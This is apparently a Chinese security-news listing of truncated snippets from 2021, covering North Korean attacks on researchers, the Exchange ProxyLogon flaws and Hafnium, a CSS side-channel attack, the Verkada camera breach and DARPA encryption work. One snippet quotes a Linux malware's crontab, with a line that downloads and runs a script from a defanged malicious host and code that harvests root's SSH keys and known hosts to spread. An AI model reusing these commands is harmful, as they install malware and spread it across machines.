微软已经修补了一个关键的零日漏洞，朝鲜黑客正利用这个漏洞以恶意软件为目标对安全研究人员进行攻击。 1月份，谷歌和微软的帖子曝光了这些0day攻击。两篇帖子都说，受朝鲜政府支持的黑客花了数周时间与安全研究人员发展工作关系。为了赢得研究人员的信任，黑客创建了一个研究博客和Twitter角色，他们与研究人员联系，询问他们是否愿意就某个项目进行合作。 最终，假的Twitter资料要求研究人员使用Internet Explorer打开一个网页。那些上钩的人会发现，他们打了完整补丁的Windows 10机器被安装了一个恶意服务和一个内存后门，该后门联系了一个黑客控制的服务器。...

3 月 2 日，微软面向 Microsoft Exchange Server 2013, 2016 和 2019 紧急发布带外(Out of Band)安全更新，修复了一个预认证的远程代码执行（RCE）漏洞链（CVE-2021-26855、CVE-2021-26857、CVE-2021-26858和 黑客可以利用这些漏洞在不知道有效账户凭证的情况下接管任意可访问的 Exchange 服务器。截止发稿为止，目前有超过 5000 台右键服务器检测到了 webshells，超过 6 万个客户受到影响，而欧洲银行业管理局等多个重要机构遭到攻击。...

一支安全研究团队近日展示了基于浏览器的全新旁道攻击（Side-channel attack），即便是 JavaScript 在被阻止的情况下也能生效。目前包括英特尔酷睿、AMD Ryzen、三星 Exynos 甚至于苹果自研芯片 M1 这些硬件平台都受到影响。 为了演示该攻击，安全专家开发了一系列对 JavaScript 功能依赖性降低的攻击，这导致了“首个基于浏览器的旁道攻击”，完全由层叠样式表（CSS）和HTML构建，即使在脚本执行被完全阻止时也能工作。...

据悉，美国现任总统乔·拜登（Joe Biden）任命克莱尔·马托拉纳（Clare Martorana）为美国首席信息官（Chief Information Officer），负责全面监管美国白宫升级政府技术基础设施的工作。Martorana 是美国数字服务部门的资深人士， Martorana 还将会负责确保数字选举信息和网上选民登记对每个人都是无障碍的，包括残疾人和英语理解能力有限的人。这部分职责对拜登来说尤为重要，他最近发布了一项旨在加强投票权的行政命令。...

由于更多的黑客组织涌入，试图在受影响的公司为其服务器打补丁之前趁虚而入，微软Exchange服务器被黑客攻击正成为一个更大的安全问题。微软3月3日披露，黑客组织 "Hafnium"的攻击目标是微软Exchange服务器的漏洞，促使微软发布补丁。 漏洞公布后不久，Hafnium加强了攻击力度，在几天内袭击了3万家美国机构和世界各地的其他机构，但现在其他机构也加入了战团。安全专家告诉《金融时报》，更多的黑客组织正在利用这个机会，利用同样的漏洞进行自己的攻击。包括犯罪集团在内的黑客们，都是在托管服务器的组织打上补丁和保护之前，利用软件漏洞介入的。...

北京时间3月10日消息，一群黑客表示，他们已经入侵了硅谷监控创业公司Verkada收集的海量监控摄像头数据，能够看到医院、公司、警局、监狱以及学校内部的15万个监控摄像头的实时录像情况。 监控视频被曝光的企业包括特斯拉、软件提供商Cloudflare。此外，黑客还能够看到女子卫生诊所、精神病院以及Verkada本身办公室内部的视频。其中一个视频拍摄自特斯拉上海仓库内部，能够看到装配线上的工人。黑客称，他们能够访问特斯拉工厂和仓库内的222个摄像头。...

/etc/phpguard
/etc/phpupdate
/etc/networkmanager
Crontab任务：

*/30 * * * * sh /etc/newdat.sh
*/2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm. if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/....

上周五，网络安全记者布莱恩·克雷布斯（Brian Krebs）和安迪·格林伯格（Andy Greenberg）报道称，在一次前所未有的电子邮件服务器攻击中有多达 3 万个组织受到影响。不过在上周末评估的最新数据，全球有超过 6 万个微软 Exchange 服务器客户被黑客攻击， Krebs 目前已经梳理了大规模 Exchange 服务器入侵事件的基本时间表，表示微软早在今年 1 月就已意识到这些漏洞。而首个安全补丁是在将近 2 个月之后才发布的，同时官方还发布了一篇博客文章，但没有解释攻击的范围和规模。甚至于微软原本计划将该补丁放在补丁星期二活动日上推出，但鉴于漏洞影响太大，...

微软和英特尔已经签署了一项协议以帮助国防高级研究计划局(DARPA)开发一种完全同态加密(FHE)解决方案，该方案将消除数据必须解密才能处理等几个薄弱环节。通过FHE，可以对加密信息进行计算，这将消除解密数据的风险，但如今要实现它需要的计算能力非常大。 为了解决这个问题，DARPA启动了虚拟环境中的数据保护（DPRIVE）计划，英特尔和微软将参与该计划，致力于开发FHE计算的硬件加速器。...

本周五，一位知情人士表示，微软（Microsoft Corp.）电子邮件软件中的一个漏洞遭黑客攻击，超过2万个美国机构已被攻破。此次黑客攻击的范围已经超过了此前从太阳风公司（SolarWinds Corp）下载的所有受污染代码，该公司是去年12月曝光的另一场大规模黑客攻击的核心目标。 美国调查记录显示，最新的黑客攻击使得信用合作社、乡镇政府和小型企业均接入了远程接入渠道。 记录显示，来自亚洲和欧洲的数万个组织也受到了影响。...